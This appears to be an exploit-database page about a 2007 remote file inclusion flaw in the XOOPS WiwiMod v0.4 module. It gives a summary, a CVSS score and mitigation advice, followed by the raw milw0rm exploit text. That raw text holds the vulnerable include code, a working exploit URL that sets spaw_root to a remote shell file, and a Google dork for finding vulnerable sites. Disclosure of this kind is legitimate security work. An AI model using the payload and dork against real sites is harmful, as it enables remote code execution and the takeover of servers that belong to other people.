header-logo
Suggest Exploit
vendor:
XOOPS Module WiwiMod
by:
GoLd_M
7.5
CVSS
HIGH
RFI
CWE
Product Name: XOOPS Module WiwiMod
Affected Version From: WiwiMod v0.4
Affected Version To: WiwiMod v0.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability

The XOOPS Module WiwiMod v0.4 has a remote file inclusion vulnerability in the spaw_root parameter. This vulnerability allows an attacker to include arbitrary remote files, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of the module, if available. Alternatively, users can remove or disable the affected module from their XOOPS installation.
Source

Exploit-DB raw data:

# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability

# D.Script:
      
http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip

# V.Code :
      include $spaw_root.'config/spaw_control.config.php';
      include $spaw_root.'class/toolbars.class.php';
      include $spaw_root.'class/lang.class.php';

# In :
      /spaw/spaw_control.class.php

# Exploits:
      /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?

#D0Rk:
      allinurl:/modules/wiwimod/


# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Team

# milw0rm.com [2007-06-20]

Navigation

Suggest Exploit

Services By CQR